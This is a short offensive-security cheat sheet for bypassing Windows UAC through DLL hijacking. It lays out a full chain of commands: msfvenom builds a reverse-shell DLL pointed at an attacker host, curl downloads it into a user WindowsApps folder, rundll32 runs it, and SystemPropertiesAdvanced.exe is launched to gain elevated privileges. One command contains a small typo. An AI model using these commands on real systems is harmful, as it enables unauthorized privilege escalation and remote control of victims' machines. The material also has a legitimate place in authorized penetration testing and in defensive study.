UAC Bypass

About

More about UAC in theory you can read here [LINK]

Here you would be looking more into UAC Bypasses, because every account. even elevated one have two types of tokens, low and high privilege. And sometimes after we got some high-privilege user we need to bypass UAC to actually use high-privilege token. Here I would write about UAC techniques I used during machines or engagements.

Very useful is UACME repository [LINK]

Also this repo is useful [LINK]

UAC Bypass with DLL Hijacking

Review Path Variable

PS C:/> cmd /c echo %PATH%

Generate Malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dll

Download DLL

curl http:/13.13.13.13:1337/srrstr.dll -O "C:\Users\ven17\AppData\Local\Microsoft\Windows Apps\srrstr.dll"

Execute Malicious DLL on Target

rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Ensure No Existing rundll32 Instances

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Execute SystemPropertiesAdvanced.exe for UAC Bypass

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Verify Elevated Privileges

whoami /priv